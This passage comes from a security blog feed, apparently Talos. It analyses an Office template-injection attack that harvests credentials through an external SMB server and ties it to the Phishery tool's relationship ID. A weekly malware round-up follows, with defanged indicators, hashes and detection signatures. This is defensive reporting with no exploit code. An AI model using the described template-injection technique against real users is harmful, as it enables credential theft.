style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-vxnNdT0YnvU/WV_nrcWKyoI/AAAAAAAAAN4/oBwYRkPdDIQP2nX-OX4JP5RGU7sGWWI3gCLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="983" data-original-width="1600" height="392" src="https://1.bp.blogspot.com/-vxnNdT0YnvU/WV_nrcWKyoI/AAAAAAAAAN4/oBwYRkPdDIQP2nX-OX4JP5RGU7sGWWI3gCLcBGAs/s640/image8.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Word attempting to load a template&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;The document was trying to pull down a template file from a particular IP, but no connection over TCP 80 had yet reached our decoy server. Sure enough, our live capture showed a failed handshake over TCP 445 instead. It was now time to manually parse the contents of the document for the IP address in question. Instead of code, we found an instance of template injection:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-MNDGZHHcFMg/WV_nxX6Z6iI/AAAAAAAAAN8/RVNxKd32XPA-5RFPpY52JAbhZX1BWd0ngCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="284" data-original-width="1600" height="112" src="https://3.bp.blogspot.com/-MNDGZHHcFMg/WV_nxX6Z6iI/AAAAAAAAAN8/RVNxKd32XPA-5RFPpY52JAbhZX1BWd0ngCLcBGAs/s640/image7.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Instance of template injection found in the document&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Our initial intelligence concerning the attack suggested that a malicious SMB server was being used to silently harvest user credentials. As conveyed in the sample, we can now see that an injected template was used to establish such a connection to an external server over SMB. Still, this did not explain why the same sample had attempted a session over TCP 80. After further research, we determined that the sandbox VM had an established preference over SMB when it came to this connection type. In short, due to the network preference of the host, a WebDAV connection was attempted over an SMB session when requesting the template. This was confirmed with another related sample when another external server was still listening on TCP 80 but no longer serving the template.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-V7ne8pl6dcc/WV_n28iiIfI/AAAAAAAAAOA/kYTidFAKYhIHkE3JRrP4Cb90ZgDeC-OtQCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1403" data-original-width="1600" height="560" src="https://3.bp.blogspot.com/-V7ne8pl6dcc/WV_n28iiIfI/AAAAAAAAAOA/kYTidFAKYhIHkE3JRrP4Cb90ZgDeC-OtQCLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Sandbox PCAP of the sample&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;The only entity left to move on from the template settings was the specific Relationship ID that was present in word/_rels/settings.xml.rels within the sample: rId1337. Researching this Relationship ID led us to the GitHub page of a phishing tool named &lt;a href="https://github.com/ryhanson/phishery"&gt;Phishery&lt;/a&gt; which happened to use the exact same ID in its template injection:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-ZOFmAV42hvE/WV_n-MsM7hI/AAAAAAAAAOE/DZ28t2qo-w4oLmDr6WZZiyTCGGKuanPBQCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="648" data-original-width="992" height="418" src="https://2.bp.blogspot.com/-ZOFmAV42hvE/WV_n-MsM7hI/AAAAAAAAAOE/DZ28t2qo-w4oLmDr6WZZiyTCGGKuanPBQCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;GitHub page of the Phishery tool&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;Suprisingly, the same ID is found at the bottom of the aforementioned Go source:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-5XRY9WwnHBU/WV_oD4PBRBI/AAAAAAAAAOI/GPtFmRchtDU8SdwCtoPCm_HoYFENcFIIACLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="255" data-original-width="1001" height="161" src="https://3.bp.blogspot.com/-5XRY9WwnHBU/WV_oD4PBRBI/AAAAAAAAAOI/GPtFmRchtDU8SdwCtoPCm_HoYFENcFIIACLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;"rId1337" found in the Phishery tool, line 105.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Phishery, however, does NOT rely on a malicious SMB server. Rather, the connection is handled over HTTPS, and the user credentials are harvested via Basic Authentication with a prompt for the credentials. Such a prompt was not needed nor seen for samples requesting the template over SMB. The fact that both this tool and the reported attack rely on template injection with the exact same Relationship ID suggests one of the following:&lt;br /&gt;&lt;br /&gt;1. Mere coincidence (always a possibility);&lt;br /&gt;2. The attackers took notice of this tool and either modified it or developed their attack from scratch while sticking to the same concept used by the tool; or&lt;br /&gt;3. The attackers used the same Relationship ID to thwart analysis of the attack itself (remember: our first inclination was to follow-up on the failed connection attempts over TCP 80).&lt;br /&gt;&lt;br /&gt;At this time, there is no evidence to confirm any of the three possibilities. However, the attackers' reliance on a successful SMB session stemming from outbound traffic over TCP 445 further confirms that organizations are still failing to properly block such egress traffic to public hosts. With no credential prompt needed for the SMB variation, we can come to understand the simplicity and effectiveness of such a technique. If an attacker is able to compromise a host and run such a server internally, the situation becomes significantly more grave.&lt;br /&gt;&lt;br /&gt;Furthermore, since the attacker controlled SMB server was down when we analyzed these samples, it is not possible to determine the ultimate payloads (if any) that could have been dropped by the template being downloaded. As we have seen with recent attacks, the intent of an attack is not always obvious. Forcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;Talos responded to these attacks by reaching out to known affected customers and ensuring that they were aware of and capable of responding to the threat. It also illustrates the importance of controlling your network traffic and not allowing outbound protocols such as SMB except where specifically required for your environment. Additionally, a number of ClamAV signatures and email rules were written in order to ensure that threats leveraging this Office template injection technique are blocked in the future.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Coverage&lt;/h2&gt;&lt;br /&gt;ClamAV signatures created to identify this attack:&lt;br /&gt;&lt;br /&gt;Doc.Tool.Phishery-6331699-0&lt;br /&gt;Doc.Downloader.TemplateInjection-6332119-0&lt;br /&gt;Doc.Downloader.TemplateInjection-6332123-0&lt;br /&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-opOM7Rp6Y9g/WV_oKXSoC0I/AAAAAAAAAOM/ZGFJdzGqCXItlK4Y24IarhhA34WIRWCiwCLcBGAs/s1600/image11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="268" data-original-width="320" src="https://2.bp.blogspot.com/-opOM7Rp6Y9g/WV_oKXSoC0I/AAAAAAAAAOM/ZGFJdzGqCXItlK4Y24IarhhA34WIRWCiwCLcBGAs/s1600/image11.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) blocks the malicious word documents used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS&lt;/a&gt;,&lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt; &lt;/a&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA&lt;/a&gt;, and&lt;a href="https://umbrella.cisco.com/"&gt; &lt;/a&gt;&lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt; can help identify outbound connections used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html"&gt;Email Security&lt;/a&gt; can block malicious emails sent by threat actors as part of their campaign. &lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and builds protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;&lt;/h2&gt;&lt;h2&gt;IOCs&lt;/h2&gt;&lt;br /&gt;Due to the nature in which we obtained intelligence related to these attacks, we are unable to share all of the IOCs related to this event; however, we wanted to share as much as possible in the spirit of transparency and collaboration.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Malicious Documents&lt;/b&gt;&lt;br /&gt;Filename:        Report03-23-2017.docx&lt;br /&gt;SHA256:         93cd6696e150caf6106e6066b58107372dcf43377bf4420c848007c10ff80bc9&lt;br /&gt;&lt;br /&gt;Filename:        Controls Engineer.docx&lt;br /&gt;SHA256:         (1) b02508baf8567e62f3c0fd14833c82fb24e8ba4f0dc84aeb7690d9ea83385baa&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (2) 3d6eadf0f0b3fb7f996e6eb3d540945c2d736822df1a37dcd0e25371fa2d75a0&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (3) ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Related IP Addresses&lt;/b&gt;&lt;br /&gt;184[.]154[.]150[.]66&lt;br /&gt;5[.]153[.]58[.]45&lt;br /&gt;62[.]8[.]193[.]206&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=sNpalbGj2jI:zKMslyTByhw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/sNpalbGj2jI" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T17:06:04.098-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-M7_TVig0AcU/WV_2Dubji2I/AAAAAAAAAOU/PjPQDCPcQ48pZhZcBc84OYwn02UQTEcNgCEwYBhgL/s72-c/talos-social.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/template-injection.html</feedburner:origLink></item><item><title>Threat Round-up for June 30 - July 07</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/AyMUnI59ekI/threat-roundup-0630-0707.html</link><category>Coverage</category><category>Malware</category><category>Threat Round-up</category><author>noreply@blogger.com (Edmund Brumaghin)</author><pubDate>Fri, 07 Jul 2017 09:30:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-5076518895276507582</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 30 and July 07. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Doc.Downloader.Generic-6332126-0&lt;/b&gt;&lt;br /&gt;Downloader&lt;br /&gt;This breed of document downloaders was discovered after following a lead on a Zbot downloader. They rely on slight obfuscations to the OOXML format that still allows for successful loading in Microsoft Word, yet prevents successful runs in select sandbox environments. They also depend on highly obfuscated JS code within a CDF binary contained within the sample itself. Most of the samples rely on repeated use of hex string concatenation, further preventing static analysis of the code.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Dropper.Agent-6332127-0&lt;/b&gt;&lt;br /&gt;Office Macro Downloader&lt;br /&gt;This is an obfuscated Office Macro downloader that leverages Powershell to download a malicious executable payload. The host that these samples attempt to download the next stage from currently does not resolve.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Macro.Obfuscation-6331107-0&lt;/b&gt;&lt;br /&gt;Office Macro&lt;br /&gt;Malware authors will attempt to obfuscate the macro code saved inside Office documents to prevent detection or to hide the intent of the code at first glance. This signature detects a recent widely used technique to hide code by using many arithmetic operations.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Phishing.NikoLata-6332081-0&lt;/b&gt;&lt;br /&gt;Web scam phishing&lt;br /&gt;The NikoLata application repeatedly opens browser windows to the maliciously controlled redirect http://bigpicturepop[.]com/redirect/57a764d042bf8 on the benign site bigpicturepop[.]com. These redirects have been seen resolving to pornographic sites, multiple tech scammer sites, and others.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.Nyetya-6331387-0&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;Nyetya is wormable destructive malware that spreads via Psexec, WMI, and the SMB exploits EternalBlue and EternalRomance. Read more about it on our blog http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html and http://blog.talosintelligence.com/2017/07/the-medoc-connection.html.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Fileinfector-67&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;Win.Trojan.Fileinfector-67 is a file infector that will spread itself by injecting its code into any kind of file in the filesystem.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Fynloski-6332091-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Fynloski is a trojan which can be used to deliver other malware to infected computers. These samples are self-extracting cab archives, and the dropped binaries are further obfuscated. The actual code is unpacked on the stack with mov instructions.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Siggen-6261194-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;This is a .Net malware and it has anti-vm tricks. It injects itself in another process and tries to contact CnC servers if the victim computer has network connectivity and it is not an instrumented environment.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Doc.Downloader.Generic-6332126-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\10MU_ACBPIDS_S-1-5-5-0-61147&lt;/li&gt;&lt;li&gt;Local\10MU_ACBPIDS_S-1-5-5-0-58021&lt;/li&gt;&lt;li&gt;\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59580&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;119[.]28[.]71[.]78&lt;/li&gt;&lt;li&gt;109[.]86[.]76[.]58&lt;/li&gt;&lt;li&gt;37[.]115[.]165[.]159&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;hoefnen[.]xyz&lt;/li&gt;&lt;li&gt;berasadot[.]top&lt;/li&gt;&lt;li&gt;bagrati[.]top&lt;/li&gt;&lt;li&gt;page[.]numberx[.]org&lt;/li&gt;&lt;li&gt;au[.]forestllc[.]org&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\iio322171.uu&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\lsmkk2[1].exe&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Office\Recent\account_3166.LNK&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Office\Recent\statement_d0bwfa.LNK&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Templates\~$Normal.dotm&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90&lt;/li&gt;&lt;li&gt;ed62f5e6c396940a455a82a7a1864ac696fb00e576631b3293ec53bb4292700d&lt;/li&gt;&lt;li&gt;5788dbf3fef2fbf8f4dbe3edfe8ddc955c9741f6d7287f5d7427d0df53275108&lt;/li&gt;&lt;li&gt;e2c4800a2a925ef71fe173269fe237bd2a43706e897c2de59f96ad5064a2389e&lt;/li&gt;&lt;li&gt;bf544987ac6ee03cb089d54fac8c885bb4c02ef709576f46890d51335a15bef1&lt;/li&gt;&lt;li&gt;542abc75b0bba97deafa82b3424afb98beee71d71599345e659038a7dc969219&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-Eas_0o48AY8/WOf0Ghq59bI/AAAAAAAAAyo/KBeOsopaYkUQ67bPqp3x5EUBpiJaGjx6gCLcB/s400/no-netsec-proxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-Eas_0o48AY8/WOf0Ghq59bI/AAAAAAAAAyo/KBeOsopaYkUQ67bPqp3x5EUBpiJaGjx6gCLcB/s400/no-netsec-proxy.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-X7uEBBqF7lI/WV-mLtqsOQI/AAAAAAAAASY/DwkaazW4-EMeeym-kX1Ty3gMLL3RMSIWACLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://2.bp.blogspot.com/-X7uEBBqF7lI/WV-mLtqsOQI/AAAAAAAAASY/DwkaazW4-EMeeym-kX1Ty3gMLL3RMSIWACLcBGAs/s320/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-p9A0RMbv2MI/WV-mSah165I/AAAAAAAAASc/LB8h0XHJYJw8IVArgF_dEVW-Q-itUYpDQCLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="219" data-original-width="1250" height="112" src="https://3.bp.blogspot.com/-p9A0RMbv2MI/WV-mSah165I/AAAAAAAAASc/LB8h0XHJYJw8IVArgF_dEVW-Q-itUYpDQCLcBGAs/s640/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-zTEC_QTgtqg/WV-mbZcXoAI/AAAAAAAAASg/407_gwgvUBoh6XjZBnz8QmtJo_yaq1XqACLcBGAs/s1600/hoefnen.xyz_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="414" data-original-width="1112" height="238" src="https://3.bp.blogspot.com/-zTEC_QTgtqg/WV-mbZcXoAI/AAAAAAAAASg/407_gwgvUBoh6XjZBnz8QmtJo_yaq1XqACLcBGAs/s640/hoefnen.xyz_umbrella.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-jcVgo9rzvA4/WV-mincsktI/AAAAAAAAASk/qbYMd9iO5hcm-zgguqxz5VTGRU2KfRG9ACLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1600" data-original-width="900" src="https://4.bp.blogspot.com/-jcVgo9rzvA4/WV-mincsktI/AAAAAAAAASk/qbYMd9iO5hcm-zgguqxz5VTGRU2KfRG9ACLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_malware.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Dropper.Agent-6332127-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;77[.]123[.]218[.]185&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;aninasmeesmase[.]com&lt;/li&gt;&lt;li&gt;iitttyense[.]com&lt;/li&gt;&lt;li&gt;monenanshca[.]com&lt;/li&gt;&lt;li&gt;onasnenekaskeeee[.]com&lt;/li&gt;&lt;li&gt;iianem[.]com&lt;/li&gt;&lt;li&gt;mmmzmzlll[.]com&lt;/li&gt;&lt;li&gt;oppasnndnew[.]com&lt;/li&gt;&lt;li&gt;tranasportnmme[.]com&lt;/li&gt;&lt;li&gt;uuunasn[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\TEMP\request.doc&lt;/li&gt;&lt;li&gt;\TEMP\~$equest.doc&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Recent\request.lnk&lt;/li&gt;&lt;li&gt;%AppData%\alnyliz.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;17d6dc47409d9a49ff9e0af92088213e1fe7d8cac1f69d73892d229b76395c43&lt;/li&gt;&lt;li&gt;4daaadac1d8dfa337f8e13cff2e3af24cbe6aa97877f3cec1e140507e9f20f19&lt;/li&gt;&lt;li&gt;53e6613c677e5498367a85b43569c81fd4d6d8c211ace257749a7c4f49bdf632&lt;/li&gt;&lt;li&gt;8f6515daea52d6b0e02b113f0357801d55f7d74dc113ab76055ad835ede11002&lt;/li&gt;&lt;li&gt;943ea63228ffb638ad4179ea79531d282ecf01e4d58764eb7bb0c3329a82b1ea&lt;/li&gt;&lt;li&gt;97597a498ab5b13b1fe3cb52e41eee108d91364b31895f896c884c36e28e0d59&lt;/li&gt;&lt;li&gt;a0ccac6ea86fcdbae485abbf7f4374591ae4617cc78b09cb2e13657ad45a9b7e&lt;/li&gt;&lt;li&gt;dad0a717b8fe07b9fc60d7a31deff159814c1c33702256a23e882bac0b50e94a&lt;/li&gt;&lt;li&gt;df159704ed213a2f6ebf4087006acd2502aecc586b6828ae5222688cf9c20745&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/--f9EsASNCBI/WV-m8ct28PI/AAAAAAAAASo/U4Dc9okXDdUedkbDhLCRfV2kPTYEa4RRACLcBGAs/s1600/Doc_Dropper_Agent_6332127_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://4.bp.blogspot.com/--f9EsASNCBI/WV-m8ct28PI/AAAAAAAAASo/U4Dc9okXDdUedkbDhLCRfV2kPTYEa4RRACLcBGAs/s320/Doc_Dropper_Agent_6332127_0_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-ogMbT-9uy3M/WV-nC3PYqpI/AAAAAAAAASs/cJniRJPrkEolwlhu9iZa6Y6hsEc3So9LACLcBGAs/s1600/Doc_Dropper_Agent_6332127_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="723" data-original-width="1237" height="372" 